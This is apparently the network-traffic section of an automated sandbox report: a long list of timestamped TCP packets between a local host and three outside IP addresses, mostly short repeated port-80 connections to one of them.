Nov 15, 2024 18:14:16.235640049 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.235730886 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.235745907 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.249876976 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.249974012 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.249985933 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.250232935 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.250439882 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.250442028 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.250454903 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.250529051 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.272383928 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.272496939 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.272511959 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.272573948 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.272644043 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.272723913 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.272735119 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.274974108 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.275048971 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.275060892 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.275418043 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.275490999 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.275502920 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.276738882 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.276812077 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.276823044 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.278212070 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.278284073 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.278295994 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.278424978 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.278491020 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.278501034 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.282203913 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:16.282255888 CET	443	49705	142.215.209.78	192.168.2.5
Nov 15, 2024 18:14:16.282335997 CET	49705	443	192.168.2.5	142.215.209.78
Nov 15, 2024 18:14:18.908009052 CET	49704	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:28.730173111 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:28.735728979 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:28.735821962 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:28.735898972 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:28.741173983 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.780296087 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.780373096 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.780422926 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.780472040 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.780519962 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.780566931 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.780576944 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.780618906 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.780690908 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.780735970 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.780735970 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.780741930 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.780796051 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.780914068 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.785969019 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.786048889 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.786135912 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.898524046 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.898600101 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.898652077 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.898667097 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.898703098 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.898751974 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.898773909 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.898825884 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.898874044 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.898874044 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.898929119 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.898971081 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.898976088 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.899051905 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.899096012 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.899106026 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.899916887 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.899969101 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.899993896 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.900048018 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.900093079 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.900099993 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.900156021 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.900202990 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.900665998 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.900737047 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.900777102 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.900804043 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.900855064 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.900895119 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.900903940 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.901577950 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.901623011 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:29.904840946 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.904911995 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:29.904956102 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.018203020 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.018301964 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.018353939 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.018388033 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.018402100 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.018455029 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.018455982 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.018505096 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.018553019 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.018554926 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.018600941 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.018646955 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.018656015 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.018699884 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.018744946 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.018748045 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.018798113 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.018846989 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.018853903 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.018923044 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.018966913 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.018970966 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019042969 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019087076 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019097090 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.019138098 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019181967 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.019188881 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019239902 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019287109 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.019289970 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019370079 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019421101 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.019424915 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019469023 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019514084 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.019651890 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019718885 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019767046 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.019767046 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019834042 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019881010 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.019881964 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019932032 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.019979000 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.019979954 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.020030022 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.020080090 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.020082951 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.020828962 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.020888090 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.020924091 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.020982981 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.021030903 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.021030903 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.021085024 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.021132946 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.021132946 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.021184921 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.021230936 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.021235943 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.021286011 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.021336079 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.021570921 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.021641016 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.021687984 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.021688938 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.021739960 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.021786928 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.026475906 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.026551962 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.026602030 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.026603937 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.026657104 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.026710033 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.137634039 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.137710094 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.137761116 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.137764931 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.137814045 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.137861967 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.137864113 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.137914896 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.137965918 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.137989998 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138041973 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138088942 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.138092041 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138168097 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138216019 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.138237000 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138288021 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138339043 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.138358116 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138410091 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138453007 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.138459921 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138509035 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138556004 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.138559103 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138618946 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138665915 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138676882 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.138739109 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138788939 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.138803005 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138854027 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138899088 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.138905048 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.138955116 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.139003992 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.139005899 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.139054060 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.139098883 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.139103889 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.139149904 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.139199972 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.139199972 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.139252901 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.139301062 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.139301062 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.139379978 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.139431953 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.139431953 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.139482975 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.139523983 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.139530897 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.139570951 CET	80	49748	192.3.243.136	192.168.2.5
Nov 15, 2024 18:14:30.139652967 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:30.250343084 CET	49748	80	192.168.2.5	192.3.243.136
Nov 15, 2024 18:14:31.414136887 CET	49761	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:31.419248104 CET	80	49761	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:31.419361115 CET	49761	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:31.421145916 CET	49761	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:31.426156998 CET	80	49761	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:31.426230907 CET	49761	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:31.431819916 CET	80	49761	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:32.403141975 CET	80	49761	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:32.403357029 CET	49761	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:32.435517073 CET	80	49761	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:32.435619116 CET	49761	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:32.565824032 CET	49766	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:32.570909977 CET	80	49766	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:32.571132898 CET	49766	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:32.574347973 CET	49766	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:32.580605030 CET	80	49766	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:32.580657959 CET	49766	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:32.585956097 CET	80	49766	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:33.527932882 CET	80	49766	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:33.528120995 CET	49766	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:33.533600092 CET	80	49766	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:33.534763098 CET	49766	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:33.636324883 CET	49771	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:33.641382933 CET	80	49771	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:33.641690016 CET	49771	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:33.643413067 CET	49771	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:33.648427010 CET	80	49771	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:33.648797035 CET	49771	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:33.653675079 CET	80	49771	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:34.615878105 CET	80	49771	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:34.615993023 CET	49771	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:34.621400118 CET	80	49771	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:34.621454954 CET	49771	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:34.766844034 CET	49776	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:34.772663116 CET	80	49776	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:34.772731066 CET	49776	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:34.775031090 CET	49776	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:34.779875994 CET	80	49776	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:34.779934883 CET	49776	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:34.784780979 CET	80	49776	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:35.751368046 CET	80	49776	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:35.751844883 CET	49776	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:35.757467985 CET	80	49776	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:35.758560896 CET	49776	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:35.913897038 CET	49785	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:35.918895960 CET	80	49785	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:35.919065952 CET	49785	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:35.922072887 CET	49785	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:35.926969051 CET	80	49785	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:35.927180052 CET	49785	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:35.932029009 CET	80	49785	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:36.861615896 CET	80	49785	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:36.861901999 CET	49785	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:36.867216110 CET	80	49785	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:36.867290974 CET	49785	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:37.026931047 CET	49790	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:37.032130003 CET	80	49790	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:37.033534050 CET	49790	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:37.036499023 CET	49790	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:37.041474104 CET	80	49790	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:37.042043924 CET	49790	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:37.047190905 CET	80	49790	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:37.994832993 CET	80	49790	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:37.995017052 CET	49790	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:38.000485897 CET	80	49790	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:38.000576019 CET	49790	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:38.142838955 CET	49795	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:38.147821903 CET	80	49795	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:38.147924900 CET	49795	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:38.150047064 CET	49795	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:38.154905081 CET	80	49795	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:38.155116081 CET	49795	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:38.159934044 CET	80	49795	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:39.112399101 CET	80	49795	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:39.112509012 CET	49795	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:39.118237972 CET	80	49795	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:39.118293047 CET	49795	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:39.298209906 CET	49801	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:39.303273916 CET	80	49801	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:39.303364992 CET	49801	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:39.305438995 CET	49801	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:39.310437918 CET	80	49801	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:39.310498953 CET	49801	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:39.315466881 CET	80	49801	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:40.262424946 CET	80	49801	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:40.262542963 CET	49801	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:40.267944098 CET	80	49801	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:40.268004894 CET	49801	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:40.406426907 CET	49807	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:40.411712885 CET	80	49807	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:40.411797047 CET	49807	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:40.413522005 CET	49807	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:40.418675900 CET	80	49807	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:40.418720961 CET	49807	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:40.423582077 CET	80	49807	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:41.384887934 CET	80	49807	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:41.385021925 CET	49807	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:41.391581059 CET	80	49807	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:41.391635895 CET	49807	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:41.527234077 CET	49811	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:41.532645941 CET	80	49811	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:41.532766104 CET	49811	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:41.534507036 CET	49811	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:41.540343046 CET	80	49811	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:41.540422916 CET	49811	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:41.546147108 CET	80	49811	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:42.506726980 CET	80	49811	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:42.507083893 CET	49811	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:42.512207985 CET	80	49811	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:42.512284994 CET	49811	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:42.654345989 CET	49815	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:42.659257889 CET	80	49815	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:42.659346104 CET	49815	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:42.661401033 CET	49815	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:42.666220903 CET	80	49815	94.156.177.95	192.168.2.5
